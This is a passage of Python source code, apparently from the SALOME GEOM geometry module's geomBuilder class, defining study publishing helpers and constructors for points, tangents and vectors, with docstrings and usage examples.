# - VERTEX: [x y z]
# @ingroup l1_geomBuilder_auxiliary
kind = GEOM.GEOM_IKindOfShape
def __new__(cls):
global engine
global geom
global doLcc
global created
#print "==== __new__ ", engine, geom, doLcc, created
if geom is None:
# geom engine is either retrieved from engine, or created
geom = engine
# Following test avoids a recursive loop
if doLcc:
if geom is not None:
# geom engine not created: existing engine found
doLcc = False
if doLcc and not created:
doLcc = False
# FindOrLoadComponent called:
# 1. CORBA resolution of server
# 2. the __new__ method is called again
#print "==== FindOrLoadComponent ", engine, geom, doLcc, created
geom = lcc.FindOrLoadComponent( "FactoryServer", "GEOM" )
#print "====1 ",geom
else:
# FindOrLoadComponent not called
if geom is None:
# geomBuilder instance is created from lcc.FindOrLoadComponent
#print "==== super ", engine, geom, doLcc, created
geom = super(geomBuilder,cls).__new__(cls)
#print "====2 ",geom
else:
# geom engine not created: existing engine found
#print "==== existing ", engine, geom, doLcc, created
pass
#print "return geom 1 ", geom
return geom
#print "return geom 2 ", geom
return geom
def __init__(self):
global created
#print "-------- geomBuilder __init__ --- ", created, self
if not created:
created = True
GEOM._objref_GEOM_Gen.__init__(self)
self.myMaxNbSubShapesAllowed = 0 # auto-publishing is disabled by default
self.myBuilder = None
self.myStudyId = 0
self.father = None
self.BasicOp = None
self.CurvesOp = None
self.PrimOp = None
self.ShapesOp = None
self.HealOp = None
self.InsertOp = None
self.BoolOp = None
self.TrsfOp = None
self.LocalOp = None
self.MeasuOp = None
self.BlocksOp = None
self.GroupOp = None
self.FieldOp = None
pass
## Process object publication in the study, as follows:
# - if @a theName is specified (not None), the object is published in the study
# with this name, not taking into account "auto-publishing" option;
# - if @a theName is NOT specified, the object is published in the study
# (using default name, which can be customized using @a theDefaultName parameter)
# only if auto-publishing is switched on.
#
# @param theObj object, a subject for publishing
# @param theName object name for study
# @param theDefaultName default name for the auto-publishing
#
# @sa addToStudyAuto()
def _autoPublish(self, theObj, theName, theDefaultName="noname"):
# ---
def _item_name(_names, _defname, _idx=-1):
if not _names: _names = _defname
if type(_names) in [types.ListType, types.TupleType]:
if _idx >= 0:
if _idx >= len(_names) or not _names[_idx]:
if type(_defname) not in [types.ListType, types.TupleType]:
_name = "%s_%d"%(_defname, _idx+1)
elif len(_defname) > 0 and _idx >= 0 and _idx < len(_defname):
_name = _defname[_idx]
else:
_name = "%noname_%d"%(dn, _idx+1)
pass
else:
_name = _names[_idx]
pass
else:
# must be wrong usage
_name = _names[0]
pass
else:
if _idx >= 0:
_name = "%s_%d"%(_names, _idx+1)
else:
_name = _names
pass
return _name
# ---
def _publish( _name, _obj ):
fatherObj = None
if isinstance( _obj, GEOM._objref_GEOM_Field ):
fatherObj = _obj.GetShape()
elif isinstance( _obj, GEOM._objref_GEOM_FieldStep ):
fatherObj = _obj.GetField()
elif not _obj.IsMainShape():
fatherObj = _obj.GetMainShape()
pass
if fatherObj and fatherObj.GetStudyEntry():
self.addToStudyInFather(fatherObj, _obj, _name)
else:
self.addToStudy(_obj, _name)
pass
return
# ---
if not theObj:
return # null object
if not theName and not self.myMaxNbSubShapesAllowed:
return # nothing to do: auto-publishing is disabled
if not theName and not theDefaultName:
return # neither theName nor theDefaultName is given
import types
if type(theObj) in [types.ListType, types.TupleType]:
# list of objects is being published
idx = 0
for obj in theObj:
if not obj: continue # bad object
name = _item_name(theName, theDefaultName, idx)
_publish( name, obj )
idx = idx+1
if not theName and idx == self.myMaxNbSubShapesAllowed: break
pass
pass
else:
# single object is published
name = _item_name(theName, theDefaultName)
_publish( name, theObj )
pass
## @addtogroup l1_geomBuilder_auxiliary
## @{
def init_geom(self,theStudy):
self.myStudy = theStudy
self.myStudyId = self.myStudy._get_StudyId()
self.myBuilder = self.myStudy.NewBuilder()
self.father = self.myStudy.FindComponent("GEOM")
notebook.myStudy = theStudy
if self.father is None:
self.father = self.myBuilder.NewComponent("GEOM")
A1 = self.myBuilder.FindOrCreateAttribute(self.father, "AttributeName")
FName = A1._narrow(SALOMEDS.AttributeName)
FName.SetValue("Geometry")
A2 = self.myBuilder.FindOrCreateAttribute(self.father, "AttributePixMap")
aPixmap = A2._narrow(SALOMEDS.AttributePixMap)
aPixmap.SetPixMap("ICON_OBJBROWSER_Geometry")
self.myBuilder.DefineComponentInstance(self.father,self)
pass
self.BasicOp = self.GetIBasicOperations (self.myStudyId)
self.CurvesOp = self.GetICurvesOperations (self.myStudyId)
self.PrimOp = self.GetI3DPrimOperations (self.myStudyId)
self.ShapesOp = self.GetIShapesOperations (self.myStudyId)
self.HealOp = self.GetIHealingOperations (self.myStudyId)
self.InsertOp = self.GetIInsertOperations (self.myStudyId)
self.BoolOp = self.GetIBooleanOperations (self.myStudyId)
self.TrsfOp = self.GetITransformOperations(self.myStudyId)
self.LocalOp = self.GetILocalOperations (self.myStudyId)
self.MeasuOp = self.GetIMeasureOperations (self.myStudyId)
self.BlocksOp = self.GetIBlocksOperations (self.myStudyId)
self.GroupOp = self.GetIGroupOperations (self.myStudyId)
self.FieldOp = self.GetIFieldOperations (self.myStudyId)
# set GEOM as root in the use case tree
self.myUseCaseBuilder = self.myStudy.GetUseCaseBuilder()
self.myUseCaseBuilder.SetRootCurrent()
self.myUseCaseBuilder.Append(self.father)
pass
def GetPluginOperations(self, studyID, libraryName):
op = GEOM._objref_GEOM_Gen.GetPluginOperations(self, studyID, libraryName)
return op
## Enable / disable results auto-publishing
#
# The automatic publishing is managed in the following way:
# - if @a maxNbSubShapes = 0, automatic publishing is disabled.
# - if @a maxNbSubShapes = -1 (default), automatic publishing is enabled and
# maximum number of sub-shapes allowed for publishing is unlimited; any negative
# value passed as parameter has the same effect.
# - if @a maxNbSubShapes is any positive value, automatic publishing is enabled and
# maximum number of sub-shapes allowed for publishing is set to specified value.
#
# @param maxNbSubShapes maximum number of sub-shapes allowed for publishing.
# @ingroup l1_publish_data
def addToStudyAuto(self, maxNbSubShapes=-1):
"""
Enable / disable results auto-publishing
The automatic publishing is managed in the following way:
- if @a maxNbSubShapes = 0, automatic publishing is disabled;
- if @a maxNbSubShapes = -1 (default), automatic publishing is enabled and
maximum number of sub-shapes allowed for publishing is unlimited; any negative
value passed as parameter has the same effect.
- if @a maxNbSubShapes is any positive value, automatic publishing is enabled and
maximum number of sub-shapes allowed for publishing is set to this value.
Parameters:
maxNbSubShapes maximum number of sub-shapes allowed for publishing.
Example of usage:
geompy.addToStudyAuto() # enable auto-publishing
geompy.MakeBoxDXDYDZ(100) # box is created and published with default name
geompy.addToStudyAuto(0) # disable auto-publishing
"""
self.myMaxNbSubShapesAllowed = max(-1, maxNbSubShapes)
pass
## Dump component to the Python script
# This method overrides IDL function to allow default values for the parameters.
def DumpPython(self, theStudy, theIsPublished=True, theIsMultiFile=True):
"""
Dump component to the Python script
This method overrides IDL function to allow default values for the parameters.
"""
return GEOM._objref_GEOM_Gen.DumpPython(self, theStudy, theIsPublished, theIsMultiFile)
## Get name for sub-shape aSubObj of shape aMainObj
#
# @ref swig_SubShapeName "Example"
@ManageTransactions("ShapesOp")
def SubShapeName(self,aSubObj, aMainObj):
"""
Get name for sub-shape aSubObj of shape aMainObj
"""
# Example: see GEOM_TestAll.py
#aSubId = orb.object_to_string(aSubObj)
#aMainId = orb.object_to_string(aMainObj)
#index = gg.getIndexTopology(aSubId, aMainId)
#name = gg.getShapeTypeString(aSubId) + "_%d"%(index)
index = self.ShapesOp.GetTopologyIndex(aMainObj, aSubObj)
name = self.ShapesOp.GetShapeTypeString(aSubObj) + "_%d"%(index)
return name
## Publish in study aShape with name aName
#
# \param aShape the shape to be published
# \param aName the name for the shape
# \param doRestoreSubShapes if True, finds and publishes also
# sub-shapes of <VAR>aShape</VAR>, corresponding to its arguments
# and published sub-shapes of arguments
# \param theArgs,theFindMethod,theInheritFirstArg see RestoreSubShapes() for
# these arguments description
# \return study entry of the published shape in form of string
#
# @ingroup l1_publish_data
# @ref swig_all_addtostudy "Example"
def addToStudy(self, aShape, aName, doRestoreSubShapes=False,
theArgs=[], theFindMethod=GEOM.FSM_GetInPlace, theInheritFirstArg=False):
"""
Publish in study aShape with name aName
Parameters:
aShape the shape to be published
aName the name for the shape
doRestoreSubShapes if True, finds and publishes also
sub-shapes of aShape, corresponding to its arguments
and published sub-shapes of arguments
theArgs,theFindMethod,theInheritFirstArg see geompy.RestoreSubShapes() for
these arguments description
Returns:
study entry of the published shape in form of string
Example of usage:
id_block1 = geompy.addToStudy(Block1, "Block 1")
"""
# Example: see GEOM_TestAll.py
try:
aSObject = self.AddInStudy(self.myStudy, aShape, aName, None)
if aSObject and aName: aSObject.SetAttrString("AttributeName", aName)
if doRestoreSubShapes:
self.RestoreSubShapesSO(self.myStudy, aSObject, theArgs,
theFindMethod, theInheritFirstArg, True )
except:
print "addToStudy() failed"
return ""
return aShape.GetStudyEntry()
## Publish in study aShape with name aName as sub-object of previously published aFather
# \param aFather previously published object
# \param aShape the shape to be published as sub-object of <VAR>aFather</VAR>
# \param aName the name for the shape
#
# \return study entry of the published shape in form of string
#
# @ingroup l1_publish_data
# @ref swig_all_addtostudyInFather "Example"
def addToStudyInFather(self, aFather, aShape, aName):
"""
Publish in study aShape with name aName as sub-object of previously published aFather
Parameters:
aFather previously published object
aShape the shape to be published as sub-object of aFather
aName the name for the shape
Returns:
study entry of the published shape in form of string
"""
# Example: see GEOM_TestAll.py
try:
aSObject = self.AddInStudy(self.myStudy, aShape, aName, aFather)
if aSObject and aName: aSObject.SetAttrString("AttributeName", aName)
except:
print "addToStudyInFather() failed"
return ""
return aShape.GetStudyEntry()
## Unpublish object in study
#
# \param obj the object to be unpublished
def hideInStudy(self, obj):
"""
Unpublish object in study
Parameters:
obj the object to be unpublished
"""
ior = salome.orb.object_to_string(obj)
aSObject = self.myStudy.FindObjectIOR(ior)
if aSObject is not None:
genericAttribute = self.myBuilder.FindOrCreateAttribute(aSObject, "AttributeDrawable")
drwAttribute = genericAttribute._narrow(SALOMEDS.AttributeDrawable)
drwAttribute.SetDrawable(False)
# hide references if any
vso = self.myStudy.FindDependances(aSObject);
for refObj in vso :
genericAttribute = self.myBuilder.FindOrCreateAttribute(refObj, "AttributeDrawable")
drwAttribute = genericAttribute._narrow(SALOMEDS.AttributeDrawable)
drwAttribute.SetDrawable(False)
pass
pass
# end of l1_geomBuilder_auxiliary
## @}
## @addtogroup l3_restore_ss
## @{
## Publish sub-shapes, standing for arguments and sub-shapes of arguments
# To be used from python scripts out of addToStudy() (non-default usage)
# \param theObject published GEOM.GEOM_Object, arguments of which will be published
# \param theArgs list of GEOM.GEOM_Object, operation arguments to be published.
# If this list is empty, all operation arguments will be published
# \param theFindMethod method to search sub-shapes, corresponding to arguments and
# their sub-shapes. Value from enumeration GEOM.find_shape_method.
# \param theInheritFirstArg set properties of the first argument for <VAR>theObject</VAR>.
# Do not publish sub-shapes in place of arguments, but only
# in place of sub-shapes of the first argument,
# because the whole shape corresponds to the first argument.
# Mainly to be used after transformations, but it also can be
    #                           useful after partition with one object shape, and some other
# operations, where only the first argument has to be considered.
# If theObject has only one argument shape, this flag is automatically
# considered as True, not regarding really passed value.
# \param theAddPrefix add prefix "from_" to names of restored sub-shapes,
# and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
# \return list of published sub-shapes
#
# @ref tui_restore_prs_params "Example"
def RestoreSubShapes (self, theObject, theArgs=[], theFindMethod=GEOM.FSM_GetInPlace,
theInheritFirstArg=False, theAddPrefix=True):
"""
Publish sub-shapes, standing for arguments and sub-shapes of arguments
To be used from python scripts out of geompy.addToStudy (non-default usage)
Parameters:
theObject published GEOM.GEOM_Object, arguments of which will be published
theArgs list of GEOM.GEOM_Object, operation arguments to be published.
If this list is empty, all operation arguments will be published
theFindMethod method to search sub-shapes, corresponding to arguments and
their sub-shapes. Value from enumeration GEOM.find_shape_method.
theInheritFirstArg set properties of the first argument for theObject.
Do not publish sub-shapes in place of arguments, but only
in place of sub-shapes of the first argument,
because the whole shape corresponds to the first argument.
Mainly to be used after transformations, but it also can be
                               useful after partition with one object shape, and some other
operations, where only the first argument has to be considered.
If theObject has only one argument shape, this flag is automatically
considered as True, not regarding really passed value.
theAddPrefix add prefix "from_" to names of restored sub-shapes,
and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
Returns:
list of published sub-shapes
"""
# Example: see GEOM_TestAll.py
return self.RestoreSubShapesO(self.myStudy, theObject, theArgs,
theFindMethod, theInheritFirstArg, theAddPrefix)
## Publish sub-shapes, standing for arguments and sub-shapes of arguments
# To be used from python scripts out of addToStudy() (non-default usage)
# \param theObject published GEOM.GEOM_Object, arguments of which will be published
# \param theArgs list of GEOM.GEOM_Object, operation arguments to be published.
# If this list is empty, all operation arguments will be published
# \param theFindMethod method to search sub-shapes, corresponding to arguments and
# their sub-shapes. Value from enumeration GEOM::find_shape_method.
# \param theInheritFirstArg set properties of the first argument for <VAR>theObject</VAR>.
# Do not publish sub-shapes in place of arguments, but only
# in place of sub-shapes of the first argument,
# because the whole shape corresponds to the first argument.
# Mainly to be used after transformations, but it also can be
# usefull after partition with one object shape, and some other
    #                           useful after partition with one object shape, and some other
# If theObject has only one argument shape, this flag is automatically
# considered as True, not regarding really passed value.
# \param theAddPrefix add prefix "from_" to names of restored sub-shapes,
# and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
# \return list of published sub-shapes
#
# @ref tui_restore_prs_params "Example"
def RestoreGivenSubShapes (self, theObject, theArgs=[], theFindMethod=GEOM.FSM_GetInPlace,
theInheritFirstArg=False, theAddPrefix=True):
"""
Publish sub-shapes, standing for arguments and sub-shapes of arguments
To be used from python scripts out of geompy.addToStudy() (non-default usage)
Parameters:
theObject published GEOM.GEOM_Object, arguments of which will be published
theArgs list of GEOM.GEOM_Object, operation arguments to be published.
If this list is empty, all operation arguments will be published
theFindMethod method to search sub-shapes, corresponding to arguments and
their sub-shapes. Value from enumeration GEOM::find_shape_method.
theInheritFirstArg set properties of the first argument for theObject.
Do not publish sub-shapes in place of arguments, but only
in place of sub-shapes of the first argument,
because the whole shape corresponds to the first argument.
Mainly to be used after transformations, but it also can be
                               useful after partition with one object shape, and some other
operations, where only the first argument has to be considered.
If theObject has only one argument shape, this flag is automatically
considered as True, not regarding really passed value.
theAddPrefix add prefix "from_" to names of restored sub-shapes,
and prefix "from_subshapes_of_" to names of partially restored sub-shapes.
Returns:
list of published sub-shapes
"""
# Example: see GEOM_TestAll.py
return self.RestoreGivenSubShapesO(self.myStudy, theObject, theArgs,
theFindMethod, theInheritFirstArg, theAddPrefix)
# end of l3_restore_ss
## @}
## @addtogroup l3_basic_go
## @{
## Create point by three coordinates.
# @param theX The X coordinate of the point.
# @param theY The Y coordinate of the point.
# @param theZ The Z coordinate of the point.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertex(self, theX, theY, theZ, theName=None):
"""
Create point by three coordinates.
Parameters:
theX The X coordinate of the point.
theY The Y coordinate of the point.
theZ The Z coordinate of the point.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
theX,theY,theZ,Parameters = ParseParameters(theX, theY, theZ)
anObj = self.BasicOp.MakePointXYZ(theX, theY, theZ)
RaiseIfFailed("MakePointXYZ", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, distant from the referenced point
    # by the given distances along the coordinate axes.
# @param theReference The referenced point.
# @param theX Displacement from the referenced point along OX axis.
# @param theY Displacement from the referenced point along OY axis.
# @param theZ Displacement from the referenced point along OZ axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexWithRef(self, theReference, theX, theY, theZ, theName=None):
"""
Create a point, distant from the referenced point
            by the given distances along the coordinate axes.
Parameters:
theReference The referenced point.
theX Displacement from the referenced point along OX axis.
theY Displacement from the referenced point along OY axis.
theZ Displacement from the referenced point along OZ axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
theX,theY,theZ,Parameters = ParseParameters(theX, theY, theZ)
anObj = self.BasicOp.MakePointWithReference(theReference, theX, theY, theZ)
RaiseIfFailed("MakePointWithReference", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, corresponding to the given parameter on the given curve.
# @param theRefCurve The referenced curve.
# @param theParameter Value of parameter on the referenced curve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnCurve(self, theRefCurve, theParameter, theName=None):
"""
Create a point, corresponding to the given parameter on the given curve.
Parameters:
theRefCurve The referenced curve.
theParameter Value of parameter on the referenced curve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_arc = geompy.MakeVertexOnCurve(Arc, 0.25)
"""
# Example: see GEOM_TestAll.py
theParameter, Parameters = ParseParameters(theParameter)
anObj = self.BasicOp.MakePointOnCurve(theRefCurve, theParameter)
RaiseIfFailed("MakePointOnCurve", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point by projecting the given coordinates onto the given curve
# @param theRefCurve The referenced curve.
# @param theX X-coordinate in 3D space
# @param theY Y-coordinate in 3D space
# @param theZ Z-coordinate in 3D space
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnCurveByCoord(self, theRefCurve, theX, theY, theZ, theName=None):
"""
Create a point by projecting the given coordinates onto the given curve
Parameters:
theRefCurve The referenced curve.
theX X-coordinate in 3D space
theY Y-coordinate in 3D space
theZ Z-coordinate in 3D space
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_arc3 = geompy.MakeVertexOnCurveByCoord(Arc, 100, -10, 10)
"""
# Example: see GEOM_TestAll.py
theX, theY, theZ, Parameters = ParseParameters(theX, theY, theZ)
anObj = self.BasicOp.MakePointOnCurveByCoord(theRefCurve, theX, theY, theZ)
RaiseIfFailed("MakeVertexOnCurveByCoord", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, corresponding to the given length on the given curve.
# @param theRefCurve The referenced curve.
# @param theLength Length on the referenced curve. It can be negative.
# @param theStartPoint Point used to choose the direction for the calculation
# of the length. If None, start from the first point of theRefCurve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_creation_point "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnCurveByLength(self, theRefCurve, theLength, theStartPoint = None, theName=None):
"""
Create a point, corresponding to the given length on the given curve.
Parameters:
theRefCurve The referenced curve.
theLength Length on the referenced curve. It can be negative.
theStartPoint Point used to choose the direction for the calculation
of the length. If None, start from the first point of theRefCurve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
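Example of usage (illustrative; Edge_1 is an assumed, previously created curve):
p_on_edge = geompy.MakeVertexOnCurveByLength(Edge_1, 25.)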
"""
# Example: see GEOM_TestAll.py
theLength, Parameters = ParseParameters(theLength)
anObj = self.BasicOp.MakePointOnCurveByLength(theRefCurve, theLength, theStartPoint)
RaiseIfFailed("MakePointOnCurveByLength", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, corresponding to the given parameters on the
# given surface.
# @param theRefSurf The referenced surface.
# @param theUParameter Value of U-parameter on the referenced surface.
# @param theVParameter Value of V-parameter on the referenced surface.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexOnSurface "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnSurface(self, theRefSurf, theUParameter, theVParameter, theName=None):
"""
Create a point, corresponding to the given parameters on the
given surface.
Parameters:
theRefSurf The referenced surface.
theUParameter Value of U-parameter on the referenced surface.
theVParameter Value of V-parameter on the referenced surface.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_face = geompy.MakeVertexOnSurface(Face, 0.1, 0.8)
"""
theUParameter, theVParameter, Parameters = ParseParameters(theUParameter, theVParameter)
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnSurface(theRefSurf, theUParameter, theVParameter)
RaiseIfFailed("MakePointOnSurface", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point by projecting the given coordinates onto the given surface
# @param theRefSurf The referenced surface.
# @param theX X-coordinate in 3D space
# @param theY Y-coordinate in 3D space
# @param theZ Z-coordinate in 3D space
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexOnSurfaceByCoord "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnSurfaceByCoord(self, theRefSurf, theX, theY, theZ, theName=None):
"""
Create a point by projecting the given coordinates onto the given surface
Parameters:
theRefSurf The referenced surface.
theX X-coordinate in 3D space
theY Y-coordinate in 3D space
theZ Z-coordinate in 3D space
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_face2 = geompy.MakeVertexOnSurfaceByCoord(Face, 0., 0., 0.)
"""
theX, theY, theZ, Parameters = ParseParameters(theX, theY, theZ)
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnSurfaceByCoord(theRefSurf, theX, theY, theZ)
RaiseIfFailed("MakeVertexOnSurfaceByCoord", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point, which lies on the given face.
# The point will lie in an arbitrary place on the face.
# The only condition on it is a non-zero distance to the face boundary.
# Such a point can be used to uniquely identify the face inside any
# shape, in case the shape does not contain overlapped faces.
# @param theFace The referenced face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexInsideFace "Example"
@ManageTransactions("BasicOp")
def MakeVertexInsideFace (self, theFace, theName=None):
"""
Create a point, which lies on the given face.
The point will lie in an arbitrary place on the face.
The only condition on it is a non-zero distance to the face boundary.
Such a point can be used to uniquely identify the face inside any
shape, in case the shape does not contain overlapped faces.
Parameters:
theFace The referenced face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_face = geompy.MakeVertexInsideFace(Face)
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnFace(theFace)
RaiseIfFailed("MakeVertexInsideFace", self.BasicOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point on intersection of two lines.
# @param theRefLine1, theRefLine2 The referenced lines.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexOnLinesIntersection "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnLinesIntersection(self, theRefLine1, theRefLine2, theName=None):
"""
Create a point on intersection of two lines.
Parameters:
theRefLine1, theRefLine2 The referenced lines.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnLinesIntersection(theRefLine1, theRefLine2)
RaiseIfFailed("MakePointOnLinesIntersection", self.BasicOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a tangent, corresponding to the given parameter on the given curve.
# @param theRefCurve The referenced curve.
# @param theParameter Value of parameter on the referenced curve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created tangent.
#
# @ref swig_MakeTangentOnCurve "Example"
@ManageTransactions("BasicOp")
def MakeTangentOnCurve(self, theRefCurve, theParameter, theName=None):
"""
Create a tangent, corresponding to the given parameter on the given curve.
Parameters:
theRefCurve The referenced curve.
theParameter Value of parameter on the referenced curve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created tangent.
Example of usage:
tan_on_arc = geompy.MakeTangentOnCurve(Arc, 0.7)
"""
anObj = self.BasicOp.MakeTangentOnCurve(theRefCurve, theParameter)
RaiseIfFailed("MakeTangentOnCurve", self.BasicOp)
self._autoPublish(anObj, theName, "tangent")
return anObj
## Create a tangent plane, corresponding to the given parameter on the given face.
# @param theFace The face for which tangent plane should be built.
# @param theParameterU horizontal value of the center point (0.0 - 1.0).
# @param theParameterV vertical value of the center point (0.0 - 1.0).
# @param theTrimSize the size of the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created tangent.
#
# @ref swig_MakeTangentPlaneOnFace "Example"
@ManageTransactions("BasicOp")
def MakeTangentPlaneOnFace(self, theFace, theParameterU, theParameterV, theTrimSize, theName=None):
"""
Create a tangent plane, corresponding to the given parameter on the given face.
Parameters:
theFace The face for which tangent plane should be built.
theParameterU horizontal value of the center point (0.0 - 1.0).
theParameterV vertical value of the center point (0.0 - 1.0).
theTrimSize the size of the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created tangent.
Example of usage:
an_on_face = geompy.MakeTangentPlaneOnFace(tan_extrusion, 0.7, 0.5, 150)
"""
anObj = self.BasicOp.MakeTangentPlaneOnFace(theFace, theParameterU, theParameterV, theTrimSize)
RaiseIfFailed("MakeTangentPlaneOnFace", self.BasicOp)
self._autoPublish(anObj, theName, "tangent")
return anObj
## Create a vector with the given components.
# @param theDX X component of the vector.
# @param theDY Y component of the vector.
# @param theDZ Z component of the vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vector.
#
# @ref tui_creation_vector "Example"
@ManageTransactions("BasicOp")
def MakeVectorDXDYDZ(self, theDX, theDY, theDZ, theName=None):
"""
Create a vector with the given components.
Parameters:
theDX X component of the vector.
theDY Y component of the vector.
theDZ Z component of the vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vector.
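Example of usage (an illustrative sketch of a unit Z vector):
v_z = geompy.MakeVectorDXDYDZ(0., 0., 1.)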
"""
# Example: see GEOM_TestAll.py
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.BasicOp.MakeVectorDXDYDZ(theDX, theDY, theDZ)
RaiseIfFailed("MakeVectorDXDYDZ", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vector")
return anObj
## Create a vector between two points.
# @param thePnt1 Start point for the vector.
# @param thePnt2 End point for the vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vector.
#
# @ref tui_creation_vector "Example"
@ManageTransactions("BasicOp")
def MakeVector(self, thePnt1, thePnt2, theName=None):
"""
Create a vector between two points.
Parameters:
thePnt1 Start point for the vector.
thePnt2 End point for the vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vector.
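Example of usage (illustrative; p1 and p2 are assumed, previously created points):
v_12 = geompy.MakeVector(p1, p2)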
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeVectorTwoPnt(thePnt1, thePnt2)
RaiseIfFailed("MakeVectorTwoPnt", self.BasicOp)
self._autoPublish(anObj, theName, "vector")
return anObj
## Create a line, passing through the given point
# and parallel to the given direction
# @param thePnt Point. The resulting line will pass through it.
# @param theDir Direction. The resulting line will be parallel to it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
